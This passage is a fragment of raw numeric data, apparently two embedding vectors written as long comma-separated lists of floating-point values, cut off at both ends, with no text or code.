.017825585,0.0051457374,-0.05718615,-0.016403114,-0.0011878608,-0.03197801,0.0022209124,0.003900284,-0.0028468233,-0.008436587,0.0038329198,-0.009704452,-0.0031070753,0.0029453726,-0.03252086,-0.0036536588,0.017439505,0.015007953,0.009095102,0.009482119,-0.0036510723,0.014749581,0.004291146,-0.026219834,-0.010704193,0.042139884,-0.024518143,0.028086081,-0.029125651,-0.015247807,0.019404687,-0.0027901696,0.008166265,0.00664035,-0.015020975,-0.011314637,-0.004943189,0.0049228743,0.012211985,0.008592784,0.027021924,0.020437848,-0.017165227,0.002836996,0.026518323,0.013587099,0.0019607155,0.007519669,-0.0014780306,-0.01920711,-0.011671822,-0.019036433,-0.023725497,0.01492511,0.0008826695,-0.01982046,-0.0022497994,-0.0033765556,-0.0010346479,-0.01503782,-0.023299843,-0.0047997935,-0.006716487,0.029737595,-0.010183486,0.00036432303,0.002816026,-0.0085239215,-0.0121448785,-0.011361578,0.019061746,-0.011288568,-0.0047215708,0.012617868,0.017470682,-0.012384696,0.0062361783,0.017799344,-0.01141183,0.026164906,0.01580503,0.008587902,-0.007007808,0.027289368,-0.013121514,-0.021253536,-0.011084011,-0.008399788,0.012456867,0.0028425811,0.0034795438,-0.016913299,0.016523777,0.0022647486,0.008584102,0.039022174,-0.00082516327,-0.0051500183,-0.017110156,0.011055776,-0.009440995,0.022628035,0.0077943006,-0.0086973095,0.003262058,-0.015510603,-0.00823872,-0.027736455,0.011950219,0.026416846,-0.005031466,-0.03929363,0.028153159,0.015992347,0.028805045,0.015122799,-0.0104754735,-0.002317087,0.011158863,0.010854742,-0.00043622585,0.025035603,-0.021039788,0.004158069,0.0012135358,-0.011291193,-0.021226116,0.03803032,0.023208454,-0.016674759,0.010754309,0.017862776,0.020703515,-0.014514214,0.0035770084,-0.010725541,-0.02435094,0.03923371,0.0019680148,-0.029833667,-0.012907922,-0.012169645,0.013353907,-0.015888523,-0.016791355,0.023090677,-0.023530543,-0.007525606,-0.0046632313,-0.011648553,0.00096247235,0.0014981071,0.028645486,-0.008310062,0.0016801215,0.01606363,0.020004025,-0.014325206,-0.006989275,-0.006166814,-0.011940244,-0.0053432104,0.00056770595,0.00783208,-0.020345997,-0.0035901759,0.013261691,0.01073822,-0.006588789,-0.00018798205,0.017407699,0.014828396,-0.0020409487,-0.0074647414,-0.014086265,-0.027069416,-0.012363319,0.019332372,0.0034654832,0.0024372346,-0.002254384,0.0067149764,0.037194964,0.04707215,0.014965348,0.012424779,0.011517512,0.014487174,0.02280562,0.019462096,0.018779226,-0.007860684,0.006355264,-0.009241529,0.025557058,-0.0020975198,0.009576192,0.0031621885,-0.010162933,0.0012831957,-0.015085665,0.016799515,-0.021520685,0.01607244,0.02571396,-0.0013379196,0.010756274,-0.009776578,0.002732366,-0.0118014375,-0.03503117,0.0014266202,-0.020832377,0.010999668,0.01115943,0.0078046517,-0.016355664,-0.036210053,-0.048837896,0.0007896793,0.118080035,-0.00015227664,-0.0023440057,-0.00281947,0.002862106,-0.0017674778,-0.16301279,-0.020883577,0.0029568702,-0.0075861644,-0.013533728,-0.017018382,0.007979581,-0.003913206,0.0037478625,0.027141137,-0.0018789866,-0.06408631,0.010216275,-0.011205651,-0.005046347,0.013233751,0.0061518983,0.029534522,-0.04030773,-0.018026844,0.018809153,-0.01728788,0.014699777,-0.017959582,0.020541472,-0.005285634,0.009420992,-0.0019902375,-0.029655457,-0.0045734965,0.017428607,0.02542409,-0.041767035,0.0036363997,0.011698176,0.005243074,-0.037722044,-0.013351624,-0.120384715,0.020722624,0.012139828,-0.01983258,0.03505185,-0.0046077087,0.0059367125,-0.00022922615,-0.00820449,-0.015669977,0.0139317475,0.03001129,0.004733962,0.011325323,-0.0073228236,0.007376377,-0.009427417,0.0007614635,0.0058764657,-0.003322132,-0.0041105133,-0.0022678284,-0.021864764,-0.0027207995,-0.041062277,0.025010275,0.019976823,0.014412123,0.02998937,0.01138848,-0.0070084543,0.0057060337,-0.007688087,0.012458835,-0.013011654,0.0042748377,-0.0025231508,0.027949147,0.02105144,0.0086100865,0.009057179,0.003357846,0.006206529,-0.005320428,-0.00039769433,0.014949133,0.018021598,0.009727286,0.023602674,0.009628691,0.019005502,-0.020387685,-0.02405092,0.0072341785,-0.0076777153,-0.0028999883,-0.0038234035,-0.01450261,-0.0009307466,0.007186864,0.00038962843,-0.009214532,-0.018264366,0.0073075737,0.015084449,-0.0045261895,0.009679954,-0.031229338,0.010730214,0.012673108,-0.008058333,0.009411612,0.020970283,-0.022577172,0.0026511287,0.011148002,-0.00814367,0.008812632,0.019972133,-0.02058549,0.026707135,0.023700891,0.007662215,-0.024154369,-0.018115724,0.01685453,0.016469095,0.013049927,-0.02497196,0.015154478,0.004314315,-0.012664321,0.0081073465,-0.005760804,0.017594837,0.0118818395,0.01680189,-0.019279603,-0.035990223,0.015285983,0.00088382966,-0.016064696,-0.009970092,0.013292682,0.00046926594,-0.009893251,0.00972338,-0.009873026,-0.024913276,-0.0011728762,-0.0237049,-0.018174713,0.017446475,-0.027252572,-0.021703003,-0.016679287,0.026022345,0.022690337,0.000731517,-0.005638248,-0.03071286,0.010395067,-0.015393778,0.01863014,0.01822835,0.023149446,-0.018936574,0.019094951,-0.015627375,0.026763259,0.019500308,0.0036402636,-0.0020804428,0.004669714,0.00042087532,-0.009431325,-0.009811967,0.0038101927,-0.03083276,-0.027877778,0.0069017266,0.007508963,0.00031879244,-0.008213493,0.008273596,-0.011399698,0.011284657,-0.020564515,0.0043703075,-0.005195785,-0.012216602,0.016852092,0.005992984,-0.015568399,0.014438583,0.06501495,-0.008274911,-0.014252634,0.04002359,-0.022705285,0.015050782,0.0140250465,-0.008277633,-0.0037138555,-0.0341195,-0.006507197,0.012412791,-0.00079154817,0.013609396,-0.03131746,0.017159369,0.010086265,0.0172007,-0.0048802546,0.007314985,0.009507913,-0.0167807,0.0062113693,0.018879313,-0.0026914044,0.016803902,-0.016554393,0.015962105,-0.0059286575,-0.00382273,-0.03105909,-0.0073992414,0.008442821,0.005345532,0.007658605,-0.06270967,-0.0004667124,-0.020799933,-0.006987267,-0.015241832,-0.002477356,0.003356045,0.023730174,-0.0014169071,-0.005690462,-0.010647719,-0.0041707964,-0.0028629017,0.014063605,-0.019878415,-0.005732018,0.00582286,0.0030616496,-0.008961406,-0.0029664533,-0.0021377383,-0.0072518736,-0.0029072235,-0.0092507675,0.008613561,0.023157831,0.0061294064,-0.011842166,0.005326168,-0.009748421,0.032261763,0.034924064,0.006222567,0.00772812,0.021991352,0.006608799,-0.0074730213,-0.029719064,0.012954324,-0.003986823,-0.010108128,-0.03197572,-0.0034588778,-0.016830267,0.0040976405,0.017497588,0.016511545,-0.0044971844,-0.0042817364,-0.016137687,-0.036484215,-0.020485703,-0.007148682,-0.02746191,-0.010216134,0.006235166,-0.0007407271,0.034700118,0.009617351,-0.0044122674,0.03658345,0.019590814,0.015448908,0.013555138,0.020060461,0.009365906,0.005267092,-0.023274774,-0.021841053,-0.009156482,-0.017535552,-0.0072829956,0.02505739,-0.018879788,-0.00020767782,0.012645568,0.010564295,0.0064672413,-0.00060503534,-0.055568047,0.028415345,-0.015397986,-0.020822557,0.011484989,-0.016156064,-0.016072301,-0.021871993,-0.02348907,0.005831191,0.041506775,-0.008094196,0.00097386807,0.012343264,-0.054506127,0.014073597,0.010680807,0.025092755,0.023221383,-0.0022124362,0.0006517054,-0.005654128,-0.015351176,0.030068683,0.0168934,0.001613768,-0.01150562,0.005122385,-0.012194622,0.0074610063,-0.002782231,0.012699979,0.0026089307,-0.00625002,-0.028142212,0.015903292,-0.00082865055,0.017694242,-0.0055516344,-0.0010047975,0.027765805,0.00076335476,-0.0029179484,-0.006899869,-0.021188319,-0.02205915,0.02059108,0.02220469,0.0119714765,-0.06306239,0.00075869745,-0.0015113585,0.02174447,-0.011016048,0.006525903,0.0019388961,-0.011317792,-0.023538265,0.022687811,-0.021309113,0.012575629,0.001953582,0.0040910933,-0.0013098556,-0.0037297455,0.005464565,0.0036071066,-0.0028437125,-0.013860587,0.01326988,0.0097258175,0.00810148,-0.0065702875,0.04355893,-0.023057582,-0.012449798,0.016329518,0.013739144,-0.016253209,-0.00037650703,-0.0367827,0.0031077964,0.013000583,-0.007506513,-0.0012473193,0.019060811,0.0003755811,-0.012324283,-0.032457612,-0.004320561,0.0055928594,-0.0029361527,0.0029778038,-0.0052025667,0.003621722,0.02234181,-0.0050141984,-0.002248787,-0.04407666,-0.0012458519,0.00074529194,-0.006279641,-0.021988388,0.024089826,0.013657905,-0.040513083,-0.013002626,-0.010562758,-0.013872159,-0.0020709622,-0.0203595,0.014121669,-0.015386138,0.057065636,-0.03932979,0.0016260231,0.0136484,0.02521696,0.0134683205,0.013206106,0.009618598,-0.035521068,-0.015167952,-0.0046342346,-0.02400774,-0.018814875,0.0008879118,-0.014200368,-0.019427367,0.0019332381,-0.008625922,0.0012434148,0.0016197356,-0.013246808,-0.0014784585,-0.00048833276,-0.0016336438,0.00056489214,-0.025736576,0.025937427,0.022823106,-0.019276356,-0.01817279,-0.015668513,-0.0006470579,-0.016312927,-0.0075421417,-0.0008244378,-0.0020062083,0.009604814,-0.008677943,0.023309374,0.020244915,0.012402592,0.00860805,0.0015491406,-0.0021796103,0.0026410471,0.008944817,-0.00809518,0.0015664487,-0.016563265,0.007769694,0.010938302,-0.0045241765,0.014019358,0.04321614,-0.024907408,0.0018306639,-0.002282479,-0.016044272,-0.0036426804,0.005810104,0.0054478273,-0.010527393,-0.014053517,-0.00028955092,0.0053369687,-0.008650162,-0.016340284,-0.015305299,0.015446948,0.002596361,-0.0040228465,0.011453562,-0.0016136222,0.0117298,0.028485632,-0.004209487,0.0007439253,0.008688721,-0.013925263,0.039168987,0.004050346,0.004326937,-0.008510722,-0.01578351,-0.002137902,0.0075567886,-0.007953842,0.014116583,-0.0002113104,0.0019335172,0.041914884,-0.013983212,0.0066664554,-0.023648977,0.020221455,-0.020410648,0.00012176559,-0.011291472,-0.011076635,-0.02291112,0.0051977383,0.010891415,-0.00914091,0.015558321,-0.014582629,0.01245036,-0.13912757,0.016805777,-0.012461312,-0.010687953,-0.0012410611,-0.01390102,0.009310493,0.012331692,0.0030468195,0.00019940294,-0.025988428,0.019175876,-0.0050290343,0.028966866,0.017000902,-0.0011557292,-0.0016941611,0.013769767,-0.013211286,0.008234121,-0.0028871396,-0.014354578,-0.006220365,0.0037660133,0.009946696,0.004979428,-0.023346262,0.004384004,0.011388512,0.0076766764,0.004909943,0.0067290356,0.011602464,0.030248346,0.008834235,0.005414935,-0.005882621,0.0049359994,-0.009781213,0.03728887,-0.016498078,-0.016739441,-0.0031667873,-0.0359785,0.003914831,-0.021575233,-0.0051105875,0.0016854084,0.014515346,0.022137774,-0.01206412,0.011197404,-0.0023462148,-0.023370983,-0.037973084,-0.016658997,0.0062549915,0.010088003,0.005582515,-0.011963241,-0.015789645,0.0044714916,0.0049624215,0.00603371,-0.011779262,-0.009821611,0.004364109,-0.00977876,-0.0070600742,-0.0021342407,0.008908931,-0.008968179,-0.0029911809,-0.0054662083,-0.017524624,0.0028906488,0.014712839,-0.017590176,-0.01609064,0.03683773,-0.022544801,-0.0033428913,0.0027933524,0.0051585934,0.007389243,0.0034543932,0.002577689,0.012528999,0.00796158,0.0007665959,0.016452914,0.0064823176,-0.025567427,-0.03757538,0.001039364,0.008684487,0.03210977,0.027825346,-0.014554554,-0.01447977,-0.018603893,-0.020344209,0.0017038693,-0.028779501,-0.13202898,-0.0056352154,0.006759377,-0.011951524,0.0060482146,-0.02069231,-0.009032327,0.007827838,0.037252866,-0.0004247017,-0.0015675044,0.010090469,-0.012114815,0.000040612507,0.0036209396,0.0011352133,-0.017819716,-0.005132536,0.018872995,0.007264605,-0.003110659,-0.013663363,-0.0071077337,0.019258386,0.0019440897,0.00014511286,0.0024204422,0.04662158,0.0022667788,0.0029726054,0.0027882527,-0.00219545,-0.016635867,-0.010259542,-0.05037093,0.0000014147788,0.012937407,0.029579919,0.0093975365,0.028076435,0.0030665852,-0.005602202,0.025402429,0.00020112202,-0.017565932,-0.0168581,-0.015370216,0.016021727,-0.017778805,-0.016867623,-0.0103574805,0.0089201415,-0.0024745294,-0.01699828,-0.003684464,-0.03412495,-0.006176593,0.002630661,0.0050443965,-0.020234998,0.0028734205,0.027056452,-0.02382455,0.024267139,0.021148043,-0.009339124,-0.021461388,0.027195433,-0.010972827,0.032159455,-0.012171029,0.030091498,0.011796248,-0.021545295,0.012925359,0.015047499,0.0091382405,0.055856157,0.019932464,0.007860955,0.0039270315,0.00003510727,-0.010351737,0.004601864,-0.027619366,-0.0034391177,0.006223121,0.0007299053,-0.011980801,0.02226203,0.0003041293,0.0050669066,0.003259361,0.022679145,0.024121575,-0.009952963,0.023217559,0.0042822016,-0.028036632,-0.0052836197,-0.0053861896,0.010367568,0.001168119,0.018038109,0.005925141,0.028199853,-0.0032358086,-0.0061840517,0.0032970777,0.0026310189,-0.010887988,0.019817619,0.009544041,0.015914008,-0.0011815982,0.006596195,-0.011018329,0.007118598,-0.0067598126,0.010860166,0.01609347,-0.0044014,0.020188661,-0.012934701,-0.005279443,-0.008851475,0.0027172375,0.03679719,0.022268677,-0.0054613417,0.009573351,-0.012621855,0.018207073,-0.01600933,-0.015159169,0.024916716,-0.003510417,-0.02236898,0.023488019,0.00622867,0.020302845,-0.004799922,-0.002943021,-0.005834235,-0.008461487,0.014640327,-0.011255218,0.037146192,-0.01917962,0.004914164,0.00153515,0.009035422,-0.001547318,-0.00029097253,0.030824296,0.01269989,0.0022004584,0.003120088,0.0022364387,0.0021532222,-0.0073282686,0.033070054,0.032438543,0.009430534,0.011430891,0.0075216168,-0.021344526,-0.01382012,-0.01179235,-0.0011637983,0.0067826845,0.0020170328,0.019033762,-0.014050946,0.014459039,-0.011965465,-0.0013822799,0.03911359,0.019413587,0.029296989,-0.012725697,0.0149584925,-0.012481715,-0.014441721,0.0024024635,0.019660888,-0.013464706,-0.015967045,0.0029143433,-0.016791131,0.038528908,-0.010864521,-0.019421281,-0.0038427832,0.024898846,0.007631083,-0.0044605336,0.0065170326,-0.0006143024,-0.021228574,-0.024290623,0.011149937,-0.0009729873,0.002196374,0.009394603,-0.002846477,0.0030715584,0.024507562,-0.0027430838,-0.013780528,-0.019743286,0.0171252,0.008125946,-0.012876817,0.010761198,0.0057420456,0.011371485,-0.041408755,0.00746515,-0.0054805223,0.0070000403,-0.021202162,0.004246677,-0.0017095313,0.0005004023,0.020260883,0.008801756,0.013228614,-0.03324706,-0.0016238175,0.0124024805,0.0070340144,-0.0161819,-0.0056023793,0.0015895022,-0.013429006,0.0023489385,0.0036089756,0.0017926013,-0.009440093,0.028090784,0.03564952,0.028601553,0.012153261,-0.012310072,-0.011459706,0.01899156,0.015335379,-0.018343717,0.01436959,0.014383256,0.010686947,-0.005174939,0.019751964,-0.0023460784,0.001692054,0.032938216,0.0032139327,-0.023460465,-0.0068877256,-0.019129826,-0.0032515458,-0.012145174,-0.011407348,-0.02401392,-0.017502254,0.016434494,-0.023300642,0.00023441917,0.000106616986,-0.008541028,0.004604183,-0.014100096,0.018352183,-0.027785659,-0.0115463305,0.008021177,0.0052218544,0.01381802,-0.0015672205,0.01608796,0.0031029698,-0.00002687264,0.017242398,0.011576102,0.015692787,-0.022510048,0.0022107386,-0.0009306879,-0.0075651654,0.008182754,-0.006218393,0.0027811683,0.002984522,-0.0048696515,0.0073574735,0.011881324,-0.0020757592,-0.009298349,0.025100157,0.008443283,-0.011018266,0.008096741,-0.018256616,0.026057974,0.016682725,0.0015103689,0.02646553,0.0036905117,0.012197635,0.023562293,0.03161624,-0.022245338,0.028407311,0.017005175,-0.01500022,0.011602058,-0.014871748,-0.017904226,-0.009692133,0.0043257093,-0.013370324,0.032961212,-0.024852388,0.015694294,0.012854892,-0.0061330884,0.04440591,-0.0115916105,0.003413928,0.0370141,-0.0652068,-0.022326088,0.016022718,0.006034197,0.0071278713,0.0042767404,0.026446259,-0.0033097202,0.029908616,-0.015099324,-0.003801442,0.0021182327,-0.010870403,-0.010118767,0.01217296,0.0008673362,0.015508346,0.0070428187,-0.005985928,0.010023881,0.009470395,0.003936046,-0.0009345111,-0.026226258,0.024226418,-0.021415964,0.0032546944,-0.014256157,-0.0015853749,-0.016549073,0.00622779,0.006635511,-0.021232303,0.020647703,0.009305915,-0.02273764,0.0017131992,-0.018384313,-0.0031699098,0.004566283,0.002488642,-0.018569907,-0.021054571,-0.013733929,-0.053538498,0.0060804924,0.016772885,0.012338976,-0.003315083,-0.008764074,-0.008708451,0.015828388,0.010358131,0.01455617,0.018143706,0.020299803,-0.021851186,-0.004975755,0.02045116,-0.025272656,-0.025359564,0.005981026,-0.017605523,-0.025078675,-0.020262018,0.010287626,-0.0029825345,-0.0044494355,-0.008219865,0.00051647646,0.006105275,-0.003060879,0.012695808,-0.0027015964,0.0026961293,-0.0127546685,-0.014123855,-0.023544144,-0.02229229,0.0053065997,-0.024897844,0.00862133,0.0031859188,-0.0077726264,-0.009039519,-0.0074728993,0.008420534,-0.009760396,-0.015439536,0.017952027,-0.008794114,-0.014959514,-0.01472311,-0.003853119,0.009652422,0.003043486,-0.014979926,-0.02700939,-0.0022813822,0.023179853,0.016257107,-0.03141197,0.024042321,0.0024332202,-0.012866378,-0.012967501,-0.007953104,-0.0071427585,0.0076974644,0.008108927,0.0018249734,0.0045424895,-0.022536416,0.02143011,0.011403403,-0.019260434,0.0059737107,0.003698085,0.006882599,0.012839142,0.012521479,-0.016197907,-0.024223944,0.005428771,0.034896314,0.0064076874,0.0039164275,0.0037777936,0.022736045,0.02441321,-0.00097280176,-0.0060038804,0.009265968,-0.0007024538,0.0019938769,0.0033783438,0.018918091,0.004988661,0.0018145348,0.024514765,-0.022460267,-0.0011498363,0.0014168841,0.0049216556,0.0068441452,-0.0024795148,0.008043429,-0.015878698,-0.021755405,0.0027229304,0.0032576323,0.0033175158,-0.001218662,-0.0017323095,-0.021656932,-0.012745741,0.012217181,0.022758482,0.016945234,0.012215519,-0.021272708,0.00394781,-0.005432614,-0.029696204,-0.008527616,-0.009452552,-0.016655624,0.024192221,0.0019523584,-0.014263999,0.00048290435,-0.004873483,-0.004383397,-0.001798306,0.0012737011,0.034411184,0.018967927,0.0063591865,-0.0051131416,-0.006388891,-0.040145565,0.0018699452,-0.0019222682,0.024835847,0.0149317905,0.006058895,0.008066596,-0.0050156037,-0.003306039,-0.0056871716,-0.0026274193,0.001436633,0.015515088,0.0072104717,0.0068511246,0.02215093,0.0021949857,-0.005966093,-0.0047266027,0.010751677,0.00022254544,0.01273892,-0.044345263,-0.0024299398,0.001317166,0.02659332,0.03624067,-0.015965337,-0.03492384,0.01830289,-0.0077334587,0.0055137645,0.02378437,-0.015543261,-0.029821625,0.032620683,0.028152144,-0.009251659,-0.00041001372,0.004901891,0.012953292,0.020310836,0.0020377766,0.018498499,-0.0260504,0.00074503216,0.008989397,0.0055948226,-0.006151839,-0.004274545,-0.0059547373,0.0025127213,0.011714562,-0.013195334,-0.012597174,0.024442807,-0.010041519,-0.00032347807,0.0107130855,0.0039058633,0.018681062,-0.017188022,0.0026681726,0.017435968,-0.032996442,0.018208163,-0.018183742,-0.0013649241,0.015920801,0.010021011,-0.0019955472,0.0064894245,-0.0013417825,-0.002916976,-0.004645739,-0.02431074,0.01428605,0.12240927,-0.0033358156,-0.015749797,-0.016531661,0.0073754964,0.0023441748,0.006954876,-0.015453086,0.028095808,-0.019602636,0.012917994,-0.02177163,0.012840349,-0.0075568142,-0.0027469494,0.026130572,-0.0009414876,-0.006868955,0.011488626,0.011790478,0.009999309,-0.01895601,0.0016373823,-0.037778333,-0.033094354,-0.0457323,0.02430773,0.00996819,0.0071570515,0.011610524,-0.015810598,-0.019048905,-0.018798111,0.019469006,-0.02381298,0.004228054,0.009500456,0.0015844229,-0.0018749523,-0.045984484,0.015131131,-0.004232538,-0.0007241092,-0.021998256,-0.016890548,-0.031852983,0.010498939,-0.01717738,0.006141963,-0.01919502,0.012822583,0.029323122,-0.0014371286,-0.0076682037,0.017717952,-0.015567805,0.008630114,-0.0037273022,0.017042091,-0.0037601271,-0.004166636,0.007648107,-0.008789128,-0.011128604,0.026801703,0.008419847,0.007164738,0.015682794,-0.014943268,-0.009223169,-0.009777623,-0.013645462,-0.002213486,0.020742886,-0.012589415,0.0058495468,-0.005871953,-0.006561866,-0.016798772,-0.022188492,-0.026859924,-0.013072829,0.020004459,0.011833124,-0.0062057427,0.021489648,-0.018654967,0.034501586,0.0006193351,0.0050364453,-0.015936097,0.025389636,0.02032044,0.009582011,0.0022867338,0.012536623,0.040791262,-0.0066591585,-0.027329879,-0.0014179663,-0.036030002,-0.019943876,0.010795413,0.0121929515,0.009596257,-0.018213758,-0.009387695,0.037396327,-0.017339576,-0.0077244104,0.024149437,0.012525001,0.0025561068,0.01131918,0.01058919,0.019977389,-0.03208542,-0.039313152,-0.010819689,-0.014227055,-0.0004299729,0.022506157,0.040210187,0.02500002,-0.0048092618,0.01506083,0.007181221,0.007287404,0.012027211,-0.006632021,0.018474385,-0.03913404,-0.003778566,0.003627457,0.0006446263,-0.00064349547,0.019234337,0.02761113,0.0026948624,-0.019031918,0.006391,-0.006173442,-0.011250634,-0.006395585,0.017724393,0.013607479,0.012290795,-0.021904739,-0.0045624394,0.0024529384,-0.005210821,-0.0006145345,-0.011230086,-0.011964096,-0.03367881,0.0024355142,-0.013041956,0.0074343765,-0.0072594294,0.007722008,0.010588493,0.0039252313,0.029193273,-0.038657494,0.008434389,0.0057790373,0.009139003,-0.018674541,0.016508108,-0.008929762,-0.0045850337,0.013387498,-0.005766241,0.023653334,-0.002796904,-0.0062926,0.003314431,0.03407516,0.0010015792,0.014842484,0.0069099884,0.014073612,-0.0003028974,-0.019339643,0.034576755,0.0010598612,-0.002485925,0.008054761,-0.0046143834,0.020638376,-0.007838674,-0.024567518,-0.0073024426,0.004565773,-0.012330102,0.013483149,-0.0091181435,0.03069557,-0.0138681065,-0.028291075,-0.0014505181,-0.015327881,0.02158888,-0.017240629,0.0006555727,-0.021073116,-0.012299527,0.0069451183,-0.014870588,0.017290363,0.010196751,0.0068702153,0.0145939095,-0.025563419,-0.0006256485,-0.00274647,-0.003657887,-0.009139886,-0.023154795,0.0043108733,0.010462756,0.014028503,-0.021713583,-0.008279275,0.01107891,-0.007183897,0.0049268436,0.017014945,0.00020223869,-0.005428418,-0.0050515602,-0.0004681827,-0.0054891147,0.0020364067,-0.00067540334,0.0049053878,0.020081362,0.026432823,-0.011024969,-0.007932597,0.004686529,0.0049773483,-0.000925414,-0.012247905,-0.023953265,0.009319881,0.0209759,0.0020687946,0.007927468,-0.014643006,-0.0069454773,-0.00475122,-0.01343109,0.006235807,-0.008932845,-0.023621539,0.0077044494,0.029992007,0.0094263265,-0.01468498,0.032385923,0.026710799,-0.025724022,0.032575864,-0.013159929,-0.020769695,0.012212512,0.007672057,-0.0071413335,0.025793897,-0.030439623,-0.009932826,-0.009530689,0.023342568,-0.0012677113,0.012683774,0.005520591,-0.000570032,-0.0021092782,-0.0027226554,0.022960277,-0.0042805052,-0.0069630467,-0.0022777284,0.020285554,0.0010027491,-0.00426231,0.00034773917,0.026133502,-0.061065886,0.0032569196,-0.0018609641,-0.0053224894,-0.052665442,0.02144223,-0.004035355,-0.05126985,-0.017818099,0.03235251,0.0051913084,-0.010374151,-0.035145286,0.0075214044,0.029569516,-0.003672518,-0.0070423065,0.002424468,-0.00014548845,-0.030604783,0.020249275,-0.012368821,-0.0013420526,-0.004269496,-0.006611346,-0.004656751,0.0033028335,0.002654737,-0.0079218075,0.025764564,-0.0045237923,0.021108797,-0.026778147,0.0028873829,0.019930225,0.008204844,0.010302515,0.0015101512,-0.026113324,-0.037753545,-0.015100212,-0.022695888,0.0078946715,-0.0025115912,-0.0002667799,-0.01429723,0.020951236,-0.0153493835,0.106317356,-0.016595623,0.008215612,-0.00019916387,-0.006727333,-0.0139868455,0.009968739,0.024306016,-0.00016615188,0.023309095,-0.023070036,-0.01691693,0.023858145,0.028682522,0.008701992,-0.0071532857,0.014027374,0.10029243,-0.026512174,0.013245584,-0.0016179784,0.0066941874,0.008566663,0.019883363,0.02360296,-0.074042626,0.00520228,-0.0366155,0.030019274,-0.005256953,-0.040484276,0.020889727,0.008444372,-0.009447664,0.00021497732,0.026256034,0.018940613,0.004670712,-0.031009542,-0.009016049,-0.02159221,-0.0046243607,-0.013427946,-0.017899932,0.00040955583,0.0149965,-0.029919215,0.032891117,-0.0064108055,0.029142577,-0.002330554,-0.0020218838,0.009027339,-0.0027967677,-0.0020587766,0.0015234271,0.006335598,0.017283484,-0.017546441,-0.016236758,-0.027633917,0.011983598,-0.0144264465,0.0077259485,0.0034595865,-0.015182162,0.0008644125,-0.0026958594,0.02780214,0.0028816322,0.027628515,0.028551893,-0.033186525,-0.01004659,-0.030985901,-0.0067422716,-0.013994421,-0.003599326,0.010764749,0.0136079965,0.023524234,0.030611217,-0.016469436,0.014723967,0.015250923,0.018010763,0.009575499,0.006582203,0.014277381,0.004679066,0.021577496,0.009874088,0.006994588,-0.005627702,-0.0005592986,0.008294698,-0.00013284867,-0.0020822508,-0.01361653,-0.02939608,-0.002304388,0.020257287,0.008948403,0.0030098455,-0.0026306354,0.003938748,0.01421492,-0.012667383,-0.029109057,0.011521344,0.0063324017,0.008826387,-0.0028751458,0.022303894,0.0009328167,-0.0022142488,0.008589923,0.018380092,-0.04917496,-0.022288017,0.01998947,-0.0134337405,0.0023532007,0.0031582618,-0.007917433,0.0026131102,0.0036130485,0.022594059,0.0069599454,-0.018670484,-0.0079990225,0.012204862,-0.015638547,0.043938212,-0.014812968,-0.0060392264,0.009261722,-0.013838442,-0.029624205,-0.015904976,0.0054850923,-0.012588281,-0.004117539,0.0043683834,-0.007769084,-0.003003143,-0.00039667604,-0.010711546],[-0.00046632552,-0.022465985,-0.021848371,-0.035498682,0.0064816875,-0.019188432,-0.015265817,0.008815575,-0.024271984,-0.011378257,0.010442067,0.02288059,0.015110445,0.009885372,-0.036161754,0.008287043,0.0019482748,0.017401777,0.0040017385,0.015919965,0.0116684055,0.00081763114,0.012638591,0.0018792353,0.00037173575,0.006251825,0.00095505,-0.013201372,-0.0050579077,0.005580243,-0.015672501,0.048333056,0.013953291,-0.011010759,0.0027958122,-0.0067448216,-0.017222855,0.006036177,0.0019709219,0.001354601,-0.013390296,0.0057311193,-0.011055526,0.003938674,-0.015402009,0.005899522,-0.01440819,0.01386539,-0.004419018,0.019899048,0.008715496,-0.018711194,-0.011982161,0.0054552727,0.00019931982,0.015228424,0.0013441545,-0.016276713,0.0028536583,-0.035072234,-0.008285127,-0.0018261143,-0.006712621,-0.0010367332,0.035828486,-0.0094557,0.0022923395,-0.011799387,-0.0134018175,-0.026179528,-0.0018562853,-0.008861519,0.008086556,0.00995839,0.016796185,-0.008825005,-0.0063326843,0.009768087,-0.032426957,0.010017316,-0.01469623,0.004774922,0.0068260096,0.00038078992,-0.0022220914,-0.030054387,0.014990302,0.004182793,-0.011876311,-0.013682058,-0.02522551,0.0021621292,0.002327011,-0.0014367657,-0.0122561725,0.0006642205,0.033300146,-0.0043280404,0.00330098,0.003429504,0.010407952,-0.0080613755,-0.041828297,0.00845189,0.0007691527,-0.024437394,0.0009362351,-0.003502643,0.00017470834,-0.015332387,0.014334269,-0.011776377,0.0057798717,0.0134872245,0.02947724,0.003916613,-0.0056525315,0.02561052,-0.00050949585,-0.013219896,-0.0131181665,0.024233624,0.04051578,-0.0052171405,-0.011324806,-0.0059758243,0.0003443321,-0.003968448,-0.011908985,0.021554474,-0.009090036,-0.002624409,-0.000009770359,-0.01787,-0.011493286,0.010778516,-0.0025342046,-0.016910546,0.0102501,-0.027464049,0.010154841,-0.008340896,0.006615327,0.017895207,0.01593324,0.019617097,-0.007753299,0.0112185385,0.010375476,-0.006394577,0.005347403,0.001622123,0.0005678957,-0.0011320105,-0.021577964,0.031874202,0.011700458,-0.0022619825,-0.0119213825,0.006774376,0.0016842843,-0.002942864,-0.0073548825,-0.004620998,-0.011707024,-0.017347848,0.014495008,-0.01392195,0.011340875,-0.0015983287,0.030426158,0.020594638,0.007967897,0.001293713,0.016146477,0.04168786,0.00197843,-0.006693301,-0.0043631485,0.0074017025,0.00028129818,0.010184158,-0.010441955,-0.0070254984,-0.00833862,0.034154493,0.023888586,0.01760423,-0.0074194474,-0.024140391,-0.0054222774,-0.030258434,-0.016441362,-0.0018574003,-0.027865022,-0.0074356967,-0.006471197,0.11262733,0.0071612354,-0.0041827043,-0.0081185885,0.01296603,-0.0031510775,-0.008563781,0.0009931935,-0.0048393863,-0.006354698,-0.012096994,0.019296333,0.009787424,0.0010738778,-0.022383844,-0.014673716,0.00081172003,-0.0032349795,-0.060516987,0.02795147,0.013162082,0.0088245515,0.005680504,-0.0061340416,0.012829226,0.022530442,-0.04223805,-0.0018220634,-0.022136776,-0.00045387432,-0.012011808,0.021643974,-0.015680404,0.019608507,0.0023786316,-0.03204159,0.0015800019,-0.0065467455,-0.0266338,0.009880467,-0.032824278,-0.0010078631,-0.019804295,0.0070524607,0.001093542,0.018423816,0.03613906,-0.00093660847,0.0014221675,0.020802569,0.0025675595,-0.017561033,0.0014963064,0.0031276874,0.0037612442,0.00012464749,0.017997274,0.0030380273,-0.0122570805,-0.013828431,-0.015441403,0.007014029,0.019725706,0.02166557,0.02200172,-0.020786671,0.04004563,0.028393865,0.0008579976,0.029383002,-0.028523946,-0.0010531041,-0.026646383,-0.009115449,0.009441665,0.018123016,0.010367774,-0.021749906,-0.007923773,0.011441061,0.006060619,0.005898754,0.0136588095,0.00040806612,-0.009120653,-0.01887798,-0.03179662,-0.0054096454,0.011863391,-